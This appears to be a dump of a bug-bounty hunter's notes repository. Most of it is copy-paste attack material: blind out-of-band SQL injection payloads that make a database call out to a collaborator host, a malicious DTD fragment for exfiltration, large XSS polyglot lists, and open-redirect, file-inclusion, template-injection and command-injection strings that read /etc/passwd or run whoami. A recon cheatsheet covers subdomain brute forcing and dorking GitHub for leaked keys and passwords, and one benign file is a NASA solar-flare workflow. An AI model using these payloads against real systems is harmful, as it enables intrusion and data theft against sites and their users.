├── SQLi Blind OOB payloads ├── recon cheatsheet ├── testnasaworkflow.json └── Basic Attack Strings /SQLi Blind OOB payloads: -------------------------------------------------------------------------------- 1 | '+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual-- 2 | ';+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual-- 3 | "+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual-- 4 | ";+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual-- 5 | ' UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')-- 6 | '; UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')-- 7 | " UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')-- 8 | "; UNION SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')-- 9 | ' exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'-- 10 | '; exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'-- 11 | " exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'-- 12 | "; exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'-- 13 | ' copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'-- 14 | '; copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'-- 15 | " copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'-- 16 | "; copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'-- 17 | ' LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')-- 18 | '; LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')-- 19 | " LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')-- 20 | "; LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')-- 21 | -------------------------------------------------------------------------------- /recon cheatsheet: -------------------------------------------------------------------------------- 1 | Go the road less travelled, find programs that are not on hackerone or bugcrowd: 2 | https://www.bugcrowd.com/bug-bounty-list/ 3 | google: "Responsible Disclosure" or "Vulnerability Disclosure" or "responsible disclosure website list" 4 | google: responsible disclosure "bounty" 5 | Responsible Disclosure seems to give best results. 6 | intext:”Responsible Disclosure Policy” 7 | "responsible disclosure" "private program" 8 | "responsible disclosure" "private" "program" 9 | 10 | Google Dork: 11 | vulnerability disclosure program "bounty" -bugcrowd -hackerone 12 | responsible disclosure "private program" <--- find private hackerone/bugcrowd programs 13 | ========================================================================= 14 | Google Dorker: 15 | https://github.com/random-robbie/bugbountydork/blob/master/main.py 16 | 17 | Subdomain Enumeration: 18 | ./amass -active -v -d test.com OR /root/go/bin/amass -active -v -d test.com 19 | ./subfinder -d test.com OR /root/go/bin/subfinder -d test.com 20 | ./subfinder -b -w /root/Desktop/jhaddixALL/subdomainsALL.txt -d upwork.com -v 21 | python sublist3r.py -b -d example.com -v -t 40 -o example.txt 22 | python sublist3r.py -p 21,22,3389,8080,8181,8000,9443,8443,6900 23 | aquatone-discover -d test.com Enumeration with aquatone: https://blog.it-securityguard.com/visual-recon-a-beginners-guide/ 24 | 25 | ======================================================================== 26 | Subdomain Analysis: 27 | 28 | Subdomain bruteforcing: 29 | ./subfinder -d example.com -b -dL jasonhaddixall.txt OR /root/go/bin/subfinder -d test.com -b -dL jasonhaddixall.txt 30 | 31 | Subdomain Analysis: 32 | ./EyeWitness.py --prepend-https -f /root/vanillasublister.txt --web --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36" -d targetvanilla 33 | 34 | Port Scanning: 35 | nmap -p 21,22,3389,8080,8181,8000,9443,8443,6900 -iL targets.txt 36 | aquatone-scan -d uber.com -t 30 -p medium 37 | aquatone-scan -d test.com -t 30 -p small (small is port 443 and 80) 38 | 39 | webscreenshot -i /tmp/adobeurls.txt -o /targets/adobe.com -v 40 | webscreenshot -i /tmp/adobeurls.txt -o /targets/adobe.com -v -m (HTTP & HTTPS) 41 | epg-prep /root/adobe.com 42 | node yourname.js 43 | http://yourserverip:3000/photos 44 | 45 | site:site.com ext:php,asp,aspx,jsp,jspa,txt,swf 46 | 47 | http://archive.org/web/ (if subdomain name indicates critical data config.test.com or admin.test.com, try looking at it from wayback machine. may show critical data (API keys, user/pass) 48 | site:admin.target.com (if website returns 403, try google dorking the website to see if there is any endpoints you can access) 49 | -can also try searching wayback machine for endpoints via curl(https://github.com/internetarchive/wayback/blob/master/wayback-cdx-server/README.md) 50 | -curl 'http://web.archive.org/cdx/search/cdx?url=games.sidefx.com/*&output=text&fl=original&collapse=urlkey' 51 | ^^^ more info https://www.shawarkhan.com/2018/06/getting-php-code-execution-and-leverage.html 52 | You can query commoncrawl.org to discover endpoints as well: 53 | python3 cc.py github.com -y 18 -o github_2018.txt 54 | 55 | Subdomain Takeover: 56 | aquatone-takeover -d adobe.com 57 | 58 | CORS Testing: 59 | 60 | ========================================================== 61 | 62 | Directory Bruteforcing: 63 | ./dirsearch.py -u http://target.com -e * -r 64 | ./dirsearch.py -u http://target.com -e * -r -w /root/Desktop/jhaddixALL/directoriesjhaddix.txt --plain-text-report=/root/Desktop/report 65 | 66 | Finding directories: 67 | ./dirsearch.py -u http://target.com -L /root/jhaddix/jhaddixdirectories.txt 68 | https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10 <---- jason haddix directory bruteforce list 69 | ./dirsearch.py -u http://target.com -e * -r -w /opt/tools/directorywordlists/raft-medium-directories.txt --plain-text-report=/root/Desktop/report <---- bruteforce directory 70 | LOOK FOR GOBUSTER 71 | 72 | dirb 10 threads, jason haddix wordlist 73 | ============================================================ 74 | 75 | 76 | Once new directories are found, find files in those directories: 77 | ./dirsearch.py -u http://target.com -r -w /opt/tools/directorywordlists/raft-medium-files.txt --plain-text-report=/root/Desktop/report <---- bruteforce files 78 | ./dirsearch.py -u http://target.com -e * -r 79 | 80 | =========================================================== 81 | Find scripts: 82 | site:test.com ext:php 83 | site:test.com ext:asp 84 | 85 | github recon: 86 | site:github.com inurl:looker "api" "key" 87 | site:github.com inurl:looker "password" 88 | 89 | Endpoint Discovery: 90 | Linkfinder 91 | Target Tab > Right Click Target.com > Save Selected Items 92 | python linkfinder.py -o cli -i burpfile 93 | 94 | Link Finder 95 | Target Tab > Right Click Target.com > Engagement Tools > Find Scripts 96 | Ctrl A > Copy Selected URLs (Paste to textfile linkfinder.txt) 97 | cat linkfinder.txt | grep .js > linkfinder2.txt 98 | python linkfinder.py -o cli -i http://target.com/everylink.js 99 | OR copy and paste into JSParser: 100 | python handler.py (visit localhost:8008) 101 | =============================================== 102 | https://whatcms.org/ discover type of CMS running on website 103 | 104 | 105 | -------------------------------------------------------------------------------- /testnasaworkflow.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "NASA workflow", 3 | "nodes": [ 4 | { 5 | "parameters": {}, 6 | "id": "65ac0a56-a477-4f74-9952-c164a309bcea", 7 | "name": "Start", 8 | "type": "n8n-nodes-base.start", 9 | "typeVersion": 1, 10 | "position": [ 11 | 240, 12 | 300 13 | ] 14 | }, 15 | { 16 | "parameters": { 17 | "triggerTimes": { 18 | "item": [ 19 | { 20 | "mode": "everyWeek" 21 | } 22 | ] 23 | } 24 | }, 25 | "id": "f82afb85-8659-4871-b2f1-dbac9244a4d8", 26 | "name": "Cron", 27 | "type": "n8n-nodes-base.cron", 28 | "typeVersion": 1, 29 | "position": [ 30 | 460, 31 | 300 32 | ] 33 | }, 34 | { 35 | "parameters": { 36 | "resource": "donkiSolarFlare", 37 | "additionalFields": { 38 | "startDate": "={{$today.minus({days: 7}).toFormat('yyyy-MM-dd')}}", 39 | "endDate": "2022-10-13T07:00:00.000Z" 40 | } 41 | }, 42 | "id": "1a29b28e-ea0c-47d9-8e36-1bddeeec4733", 43 | "name": "NASA", 44 | "type": "n8n-nodes-base.nasa", 45 | "typeVersion": 1, 46 | "position": [ 47 | 680, 48 | 300 49 | ], 50 | "credentials": { 51 | "nasaApi": { 52 | "id": "8", 53 | "name": "NASA account" 54 | } 55 | } 56 | } 57 | ], 58 | "pinData": { 59 | "NASA": [ 60 | { 61 | "json": { 62 | "flrID": "2022-10-10T00:35:00-FLR-001", 63 | "instruments": [ 64 | { 65 | "displayName": "GOES-P: EXIS 1.0-8.0" 66 | } 67 | ], 68 | "beginTime": "2022-10-10T00:35Z", 69 | "peakTime": "2022-10-10T00:47Z", 70 | "endTime": "2022-10-10T00:55Z", 71 | "classType": "M1.0", 72 | "sourceLocation": "N25W23", 73 | "activeRegionNum": 13116, 74 | "linkedEvents": null, 75 | "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21955/-1" 76 | } 77 | }, 78 | { 79 | "json": { 80 | "flrID": "2022-10-10T16:07:00-FLR-001", 81 | "instruments": [ 82 | { 83 | "displayName": "GOES-P: EXIS 1.0-8.0" 84 | } 85 | ], 86 | "beginTime": "2022-10-10T16:07Z", 87 | "peakTime": "2022-10-10T16:28Z", 88 | "endTime": "2022-10-10T16:47Z", 89 | "classType": "M2.4", 90 | "sourceLocation": "N25W33", 91 | "activeRegionNum": 13112, 92 | "linkedEvents": null, 93 | "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21963/-1" 94 | } 95 | }, 96 | { 97 | "json": { 98 | "flrID": "2022-10-11T08:36:00-FLR-001", 99 | "instruments": [ 100 | { 101 | "displayName": "GOES-P: EXIS 1.0-8.0" 102 | } 103 | ], 104 | "beginTime": "2022-10-11T08:36Z", 105 | "peakTime": "2022-10-11T08:42Z", 106 | "endTime": "2022-10-11T08:46Z", 107 | "classType": "M3.9", 108 | "sourceLocation": "N24W35", 109 | "activeRegionNum": 13112, 110 | "linkedEvents": [ 111 | { 112 | "activityID": "2022-10-11T09:23:00-CME-001" 113 | } 114 | ], 115 | "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21973/-1" 116 | } 117 | }, 118 | { 119 | "json": { 120 | "flrID": "2022-10-11T10:47:00-FLR-001", 121 | "instruments": [ 122 | { 123 | "displayName": "GOES-P: EXIS 1.0-8.0" 124 | } 125 | ], 126 | "beginTime": "2022-10-11T10:47Z", 127 | "peakTime": "2022-10-11T10:52Z", 128 | "endTime": "2022-10-11T10:57Z", 129 | "classType": "M1.5", 130 | "sourceLocation": "N24W36", 131 | "activeRegionNum": 13112, 132 | "linkedEvents": [ 133 | { 134 | "activityID": "2022-10-11T11:36:00-CME-001" 135 | } 136 | ], 137 | "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21974/-1" 138 | } 139 | }, 140 | { 141 | "json": { 142 | "flrID": "2022-10-12T16:26:00-FLR-001", 143 | "instruments": [ 144 | { 145 | "displayName": "GOES-P: EXIS 1.0-8.0" 146 | } 147 | ], 148 | "beginTime": "2022-10-12T16:26Z", 149 | "peakTime": "2022-10-12T16:29Z", 150 | "endTime": "2022-10-08T16:33Z", 151 | "classType": "C4.7", 152 | "sourceLocation": "N25W55", 153 | "activeRegionNum": 13112, 154 | "linkedEvents": [ 155 | { 156 | "activityID": "2022-10-12T17:12:00-CME-001" 157 | } 158 | ], 159 | "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21999/-1" 160 | } 161 | }, 162 | { 163 | "json": { 164 | "flrID": "2022-10-12T23:54:00-FLR-001", 165 | "instruments": [ 166 | { 167 | "displayName": "GOES-P: EXIS 1.0-8.0" 168 | } 169 | ], 170 | "beginTime": "2022-10-12T23:54Z", 171 | "peakTime": "2022-10-13T00:19Z", 172 | "endTime": "2022-10-13T00:37Z", 173 | "classType": "M1.5", 174 | "sourceLocation": "N25W65", 175 | "activeRegionNum": 13112, 176 | "linkedEvents": null, 177 | "link": "https://webtools.ccmc.gsfc.nasa.gov/DONKI/view/FLR/21998/-1" 178 | } 179 | } 180 | ] 181 | }, 182 | "connections": { 183 | "Cron": { 184 | "main": [ 185 | [ 186 | { 187 | "node": "NASA", 188 | "type": "main", 189 | "index": 0 190 | } 191 | ] 192 | ] 193 | } 194 | }, 195 | "active": false, 196 | "settings": {}, 197 | "id": 15, 198 | "meta": { 199 | "instanceId": "32fd5f12d82daccde80319b7d5d826a11a96ed956c170eb7505d0458088a7b03" 200 | }, 201 | "tags": [] 202 | } 203 | -------------------------------------------------------------------------------- /Basic Attack Strings: -------------------------------------------------------------------------------- 1 | Not a complete list by any means, but when you're manually testing and walking through sites and need a quick copy/paste, this can come in handy... 2 | https://github.com/1N3/IntruderPayloads 3 | 4 | malicious DTD: 5 | "> %eval; %exfiltrate; 6 | 7 | 8 | Testing payment flow: 9 | Change the order quantity to 0.6 or 0.2 you may be able to pay significantly less for an item: https://hackerone.com/reports/403783 10 | ============================================================ 11 | Password Reset Token not expiring after new one generated: https://hackerone.com/reports/15166 12 | 13 | ============================================================= 14 | 15 | Misconfigured CORS: 16 | Inject the following header in the request: 17 | Origin: https://example.com 18 | If the server responds with the following: 19 | Access-Control-Allow-Origin: https://example.com 20 | Access-Control-Allow-Credentials: true 21 | 22 | You can also try: 23 | Origin: null 24 | and hopefully get: 25 | Access-Control-Allow-Origin: null 26 | Access-Control-Allow-Credentials: true 27 | 28 | ============================================================ 29 | Improper Access Control: 30 | If you notice two types of user accounts, like shop owner and shop user. Try sending HTTP requests that only shop owner can send as shop user. 31 | -If creating new shop is only available to shop owner, try sending the HTTP request that creates a new shop as shop user. 32 | 33 | Testing different levels of users admin vs user 34 | -can regular user send an HTTP request that only admins should be able to send? example: https://hackerone.com/reports/219192 35 | ========================================================== 36 | 37 | Subdomain takeover: 38 | aquatone-takeover -d test.com 39 | ============================================================ 40 | 41 | 42 | Company 43 | First Last 44 | username 45 | username@mailinator.com 46 | Password123$ 47 | +1416312384 48 | =================================================================================================== 49 | 50 | IDOR: 51 | Try bruteforcing hashed numerical IDs with intruder 52 | Try to identify parameters which aren't essential towards the request. Use repeater to delete each parameter one at a time 53 | 54 | Interesting IDOR where it was only validating username belonged to the specific record ID: https://hackerone.com/reports/148764 55 | =================================================================================================== 56 | 57 | Race Conditions: 58 | "Copy as Curl Command" 59 | 60 | =================================================================================================== 61 | API Calls: 62 | -Try to discover every single request method, and execute each request method with users of different privilege levels 63 | - GET, POST, PUT, DELETE, HEAD, OPTIONS, PATCH 64 | -Test for IDORs 65 | -Discover API Endpoints 66 | -Google Dorks site:target.com inurl:/api/v2 67 | -Query wayback machine: target.com/api/* 68 | -CC.py 69 | -Send the same API request multiple times to see if it triggers anything (coupon codes, etc) 70 | -If you ever come across undocumented or internal API, always try to a conduct a comprehensive mapping and recon to uncover all edges that might lack sufficient authorizations. https://yassineaboukir.com/blog/ 71 | -He found an API https://www.company.com/api/users// and discovered an edge located at /credit_cards/. This unknown edge allowed him to discover credit card numbers and mail messages of users 72 | 73 | =================================================================================================== 74 | 75 | OPEN REDIRECT: 76 | google.com 77 | https://google.com 78 | //google.com 79 | //google.com/?: 80 | .google.com 81 | https:google.com 82 | //google%E3%80%82com 83 | \/\/google.com/ 84 | /\/google.com/ 85 | //google%00.com 86 | /%09/google.com 87 | /%5cgoogle.com 88 | //www.google.com/%2f%2e%2e 89 | //www.google.com/%2e%2e 90 | /\victim.com:80%40google.com 91 | http://www.theirsite.com@yoursite.com/ (oldie, but browsers will redirect to anything after @) 92 | http://www.yoursite.com/http://www.theirsite.com/ 93 | ";alert(0);// 94 | java%0d%0ascript%0d%0a:alert(0) 95 | javas cript://www.google.com/%0Aalert(1) (thank you to https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md) 96 | %2F%2F%2Fjavascript:alert(document.domain); https://yassineaboukir.com/blog/ 97 | data:text/html;base64,PHNjcmlwdD5hbGVydChsb2NhdGlvbik8L3NjcmlwdD4=%23// https://yassineaboukir.com/blog/ 98 | 99 | =================================================================================================== 100 | Rate Limits: 101 | %00, %0d%0a, %09, %0C, %20, %0 102 | firstlastcompany%0a%0d%00 103 | 104 | Test to see if a certain functionality can be abused by spammers. (Sending Emails, Posting Comments, Posting) 105 | 106 | =================================================================================================== 107 | 108 | File Inclusion: 109 | https://google.com/.injectx/rfi_vuln.txt 110 | https://google.com/.injectx/rfi_vuln.txt?`whoami` 111 | https://google.com/.injectx/rfi_vuln.txt%00.png 112 | https://google.com/.injectx/rfi_vuln.txt%00.html 113 | page=1 114 | page=./1 115 | page=.//1 116 | page=././1 117 | page=../pages/1 118 | page=\1 119 | ../../../../../../../../../../../etc/passwd%00 120 | file://path/to/file 121 | file:///etc/./passwd 122 | 123 | =================================================================================================== 124 | how to fuzz for XSS: 125 | 126 | ; 127 | "test123 128 | 'test123 129 | " onerror=alert(1) 130 | javascript:alert(1) 131 | "+alert(1)+ (if in script tags) 132 | (sometimes HTML tags aren't blocked due to markdown, try to test the event handlers) 134 | (sometimes HTML tags aren't blocked due to markdown, try to test the event handlers) 135 | 136 | XSS Fuzzing: 137 | test123 138 | test123 139 | ;test123 140 | "test123 141 | 'test123 142 | 144 | ">

146 | 147 |

Hello :) 148 | alert/**/(1)// instead of alert(1) 149 | https://www.youtube.com/channel/UCfEQwwHP5t-MFdF-647n79w?fuzzing" onload=alert(document.domain) x=" <--------- https://hackerone.com/reports/333008 150 | 151 | Cross Site Scripting: 152 | Reflected Parameters 153 | javascript:alert(1)// 154 | ">' -- 155 | ">' -- 156 | '>"> 157 | INJECTX'>">">'> 170 | ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">  171 | " onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// 172 | '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 173 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 174 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 175 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 176 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 177 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 178 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 179 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 180 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 181 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 182 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 183 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* 184 | javascript://plus.google.com/?%0aalert%28document.domain%29 FRANS ROSEN https://labs.detectify.com/2015/06/06/google-xss-turkey/ 185 | 186 | https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md 187 | =================================================================================================== 188 | 189 | Server Side Template Injection: 190 | Backslash Powered Scanner 191 | 192 | {{4*4}}[[5*5]] <---- if we identify angularJS template engine running 193 | {{4+4}} 194 | {7*7} 195 | "></script>{{2*2}}${2*2} 196 | 7*7 197 | <%=`id`%> (ruby template engine) 198 | \x41 199 | {% import os %}{{ os.popen("whoami").read() }} 200 | {% import os %}{{ os.popen("cat /etc/passwd").read() }} 201 | 202 | =================================================================================================== 203 | 204 | Command Injection: 205 | sleep 5; sleep 5 || sleep 5 | sleep 5 & sleep 5 && sleep 5 206 | Backslash Powered Scanner 207 | 208 | =================================================================================================== 209 | SSRF: 210 | file :///asd 211 | file :///etc/passwd 212 | 127.0.0.1.xip.io 213 | If you cannot access any sensitive services via SSRF, try to access sensitive files or pages that require higher application level privileges: 214 | https://hackerone.com/reports/312647 215 | If SSRF is rendering the website you are pointing it to, see if you can point it to an XSS.html file that you host on your server: 216 | https://hackerone.com/reports/197902 217 | =================================================================================================== 218 | 219 | SQLi: 220 | Backslash Powered Scanner 221 | SQLipy 222 | Rule of thumb: What payloads trigger an error message or an HTTP 500? 223 | id=1‘ 224 | '" 225 | 1‘’ 226 | 1%cc‘ 227 | 1’-sleep(10)-’ 228 | +sleep(1)+ 229 | 1" 230 | 1"“ 231 | 1%cc” 232 | 1"-sleep(10)-” 233 | 1/1 234 | 1/0 235 | 1/sleep(10) 236 | 1\ 237 | admin" or "1"="1"-- 238 | admin' or '1'='1'-- 239 | /*'*/ 240 | '-sleep(100) -- <---- username field 241 | -sleep/*f*/(10) <------ integer item_id=111-sleep/*f*/(10) 242 | 243 | 244 | SQLi Fuzzing: 245 | Rule of thumb: What payloads trigger an error message or an HTTP 500? How does the baseline request compare with fuzzing request? Are the same results returned? 246 | Do the results of the query change after inserting these? If you get different results then you are probably modifying the query 247 | 248 | -- 249 | ' 250 | \' 251 | '%23 252 | '# 253 | ' -- 254 | -- ' (try commenting out the quote) 255 | # ' (try commenting out the quote) if query still works, then you just introduced sql comments into the query 256 | %23 ' (try commenting out the quote) 257 | %2527 (some servers will double URL decode) 258 | ) 259 | )) 260 | /*'*/ (try commenting out the quote) 261 | '' vs ''' (even vs odd number of quotes) 262 | id=460-5 (try subtracting) 263 | input) order by 5%23 264 | 2/*dhab bc*/OR/*dahdshka*/2/*sd*/LIKE/*da*/"2"/**/%23 265 | ' waitfor delay'00:00:10'-- - 266 | 267 | 268 | SQLi Polyglots: 269 | SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ 270 | SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample 271 | IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ 272 | 273 | SQLinjection in JSON: https://hackerone.com/reports/150156 274 | 275 | 276 | Blind SQLi 277 | ‘%2Bbenchmark(3200,SHA1(1))%2B’ 278 | ' or benchmark(10000000,md5(1))=' 279 | ‘+BENCHMARK(40000000,SHA1(1337))+’ 280 | 281 | Time/Blind Based SQLi: 282 | Check out "SQL Injection Time Based Payloads" 283 | https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind 284 | =================================================================================================== 285 | 286 | RCE: 287 | page=1`sleep 10 288 | 1|sleep 10 289 | 1$(sleep 10) 290 | 1%0asleep 10%0a 291 | --------------------------------------------------------------------------------